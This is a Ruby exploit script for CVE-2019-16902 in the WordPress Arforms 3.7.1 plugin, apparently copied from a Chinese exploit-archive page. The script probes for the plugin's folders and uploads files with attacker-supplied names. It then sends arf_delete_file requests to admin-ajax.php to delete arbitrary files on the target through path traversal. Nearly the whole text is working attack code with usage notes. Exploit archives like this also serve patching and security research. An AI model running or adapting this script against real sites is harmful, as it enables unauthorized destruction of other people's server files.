扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 |
# Exploit Title: WordPress Arforms 3.7.1 - Directory Traversal # Date: 2019-09-27 # Exploit Author: Ahmad Almorabea # Updated version of the exploit can be found always at : http://almorabea.net/cve-2019-16902.txt # Software Link: https://www.arformsplugin.com/documentation/changelog/ # Version: 3.7.1 # CVE ID: CVE-2019-16902 #**************Start Notes************** # You can run the script by putting the script name and then the URL and the URL should have directory the WordPress folders. # Example : exploit.rb www.test.com, and the site should have the WordPress folders in it such www.test.com/wp-contnet. # Pay attention to the 3 numbers at the beginning maybe you need to change it in other types like in this script is 143. # But maybe in other forms maybe it's different so you have to change it accordingly. # This version of the software is applicable to path traversal attack so you can delete files if you knew the path such ../../ and so on # There is a request file with this Script make sure to put it in the same folder. #**************End Notes**************** #!/usr/bin/env ruby require "net/http" require 'colorize' $host = ARGV[0] || "" $session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad" def start_function () puts "It's a weird question to ask but let's start friendly I'm Arforms exploit, what's your name?".yellow name = STDIN.gets if $host == "" puts "What are you doing #{name} where is the URL so we can launch the attack, please pay more attention buddy".red exit end check_existence_arform_folder execute_deletion_attack puts "Done ... see ya" + name end def send_checks(files_names) j = 1 while j <= files_names.length-1 uri = URI.parse("http://#{$host}/wp-content/uploads/arforms/userfiles/"+files_names[j]) http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https'# Enable HTTPS support if it's HTTPS request = Net::HTTP::Get.new(uri.request_uri) request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0" request["Connection"] = "keep-alive" request["Accept-Language"] = "en-US,en;q=0.5" request["Accept-Encoding"] = "gzip, deflate" request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" begin response = http.request(request).code puts "The File " + files_names[j] + " has the response code of " + response rescue Exception => e puts "[!] Failed!" puts e end j = j+1 end end def check_existence_arform_folder () path_array = ["/wp-plugins/arforms","/wp-content/uploads/arforms/userfiles"] $i = 0 results = [] while $i <= path_array.length-1 uri = URI.parse("http://#{$host}/#{path_array[$i]}") #puts uri http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https'# Enable HTTPS support if it's HTTPS request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) results[$i] = response.code #puts"response code is : " + response.code $i +=1 end puts "****************************************************" if results[0] == "200" || results[0] =="301" puts "The Plugin is Available on the following path : ".green + $host + path_array[0] else puts "We couldn't locate the Plugin in this path, you either change the path or we can't perform the attack, Simple Huh?".red exit end if (results[1] == "200" || results[1] == "301") puts "The User Filesfolder isAvailable on the following path : ".green + $host + path_array[1] else puts "We couldn't find the User Files folder, on the following path ".red +$host + path_array[1] end puts "****************************************************" end def execute_deletion_attack () puts "How many file you want to delete my man" amount = STDIN.gets.chomp.to_i if(amount == 0) puts "You can't use 0 orother strings this input for the amount of file you want to delete so it's an Integer".blue exit end file_names = [] file_names[0] = "143_772_1569713145702_temp3.txt" j = 1 while j <= amount.to_i puts "Name of the file number " + j.to_s file_names[j] = STDIN.gets file_names[j].strip! j = j+1 end uri = URI.parse("http://#{$host}") #puts uri http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) global_cookie = response.response['set-cookie'] + "; PHPSESSID="+$session_id #Assign the session cookie $i = 0 while $i <= file_names.length-1 puts "Starting the Attack Journey .. ".green uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php") headers = { 'Referer' => 'From The Sky', 'User-Agent'=> 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0', 'Content-Type'=> 'multipart/form-data; boundary=---------------------------14195989911851978808724573615', 'Accept-Encoding' => 'gzip, deflate', 'Cookie'=> global_cookie, 'X_FILENAME'=> file_names[$i], 'X-FILENAME'=> file_names[$i], 'Connection'=> 'close' } http= Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' request = Net::HTTP::Post.new(uri.path, headers) request.body = File.read("post_file") response = http.request request $i = $i +1 end execute_delete_request file_names,global_cookie,amount.to_i puts "Finished.........." end def execute_delete_request (file_names,cookies,rounds ) $i = 0 while $i <= file_names.length-1 puts "Starting the Attack on file No #{$i.to_s} ".green uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php") headers = { 'Referer' => 'From The Sky', 'User-Agent'=> 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0', 'Accept'=> '*/*', 'Accept-Language' => 'en-US,en;q=0.5', 'X-Requested-With'=> 'XMLHttpRequest', 'Cookie'=>cookies, 'Content-Type'=> 'application/x-www-form-urlencoded; charset=UTF-8', 'Accept-Encoding' => 'gzip, deflate', 'Connection'=> 'close' } http= Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' request = Net::HTTP::Post.new(uri.path,headers) request.body = "action=arf_delete_file&file_name="+file_names[$i]+"&form_id=143" response = http.request(request) if $i != 0 puts "File Name requested to delete is : " + file_names[$i] + " has the Response Code of " + response.code end $i = $i +1 end send_checks file_names end start_function() |
体验盒子
